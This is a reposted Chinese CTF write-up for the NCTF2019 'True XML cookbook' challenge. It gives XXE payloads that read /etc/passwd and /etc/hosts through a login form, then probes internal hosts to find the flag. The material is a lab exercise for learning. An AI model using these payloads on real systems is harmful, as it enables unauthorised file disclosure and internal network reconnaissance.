碼上歡樂
相關內容    簡體    繁體

[NCTF2019]True XML cookbook

本文轉載自   查看原文   2020-05-27 22:08   1151    CTF/ xxe

知識點

  • XXE探測內網

一如既往的登錄框

 

抓包,添加外部注入實體,讀取/etc/passwd

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>

<user><username>&admin;</username><password>123546</password></user>

 

讀取歷史操作命令.bash_history失敗

讀取/etc/hosts文件

 

看到內網有存活的主機,嘗試訪問

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http://173.241.204.10">
  ]>

<user><username>&admin;</username><password>123546</password></user>

  

 

在173.241.204.11主機處發現flag

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [NCTF2019]True XML cookbook [NCTF2019]Fake XML cookbook XXE漏洞學習和利用—[NCTF2019]Fake XML cookbook NCTF2019 Keyboard [NCTF2019]SQLi [NCTF2019]SQLi [NCTF2019]babyRSA [NCTF2019]SQLi 【Yii2-CookBook】JSON 和 XML 輸出 web.xml is missing and is set to true
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM